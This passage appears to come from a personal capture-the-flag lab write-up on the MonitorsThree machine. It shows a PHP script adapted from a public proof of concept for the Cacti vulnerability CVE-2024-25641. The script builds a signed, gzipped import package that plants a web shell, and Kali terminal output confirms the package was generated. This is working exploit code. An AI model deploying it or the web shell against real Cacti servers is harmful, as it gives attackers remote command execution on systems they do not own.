Malicious Package
Following the same structure of the [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]]
<?php
$xmldata = "<xml>
<files>
<file>
<name>resource/CVE-2024-25641.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
$filedata = '<?php system($_GET["cmd"]); ?>';
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("CVE-2024-25641.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat CVE-2024-25641.xml | gzip -9 > CVE-2024-25641.xml.gz; rm CVE-2024-25641.xml");
?>The [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]] has been modified to include a web shell
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ php CVE-2024-25641.php
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ ll CVE-2024-25641.xml.gz
4.0K -rw-rw-r-- 1 kali kali 1.2K Aug 25 19:02 CVE-2024-25641.xml.gzMalicious package has been successfully generated